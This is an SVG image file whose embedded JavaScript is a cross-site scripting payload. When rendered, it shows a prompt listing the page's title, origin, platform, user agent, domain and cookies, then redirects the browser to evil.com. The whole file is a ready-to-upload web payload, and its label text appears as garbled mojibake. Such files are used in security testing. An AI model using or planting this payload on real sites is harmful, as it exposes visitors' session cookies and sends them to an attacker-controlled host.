<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full"
  xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">
      prompt("Vulnerability Was here !! " + "\n" + 
      "ğšƒğš’ğšğš•ğš: " + document.title + "\n" +
      "ğ™¾ğš›ğš’ğšğš’ğš—: " + location.origin + "\n" +
      "ğ™¿ğš•ğšŠğšğšğš›ğš˜ğš–: " + navigator.platform + "\n" +
      "ğ™²ğš˜ğšğš_ğ™½ğšŠğš–ğš: " + navigator.appCodeName + "\n" +
      "ğ™¿ğšŠğšğš‘_ğš—ğšŠğš–ğš: " + location.pathname + "\n" +
      "ğš„ğšœğšğš›_ğ™°ğšğšğš—ğš: " + navigator.userAgent + "\n" +
      "ğ™³ğš˜ğš–ğšŠğš’ğš—: " + document.domain + "\n" +
      "ğ™²ğš˜ğš˜ğš”ğš’ğš: " + document.cookie );
      window.location.href="https://evil.com"
   </script>
</svg>
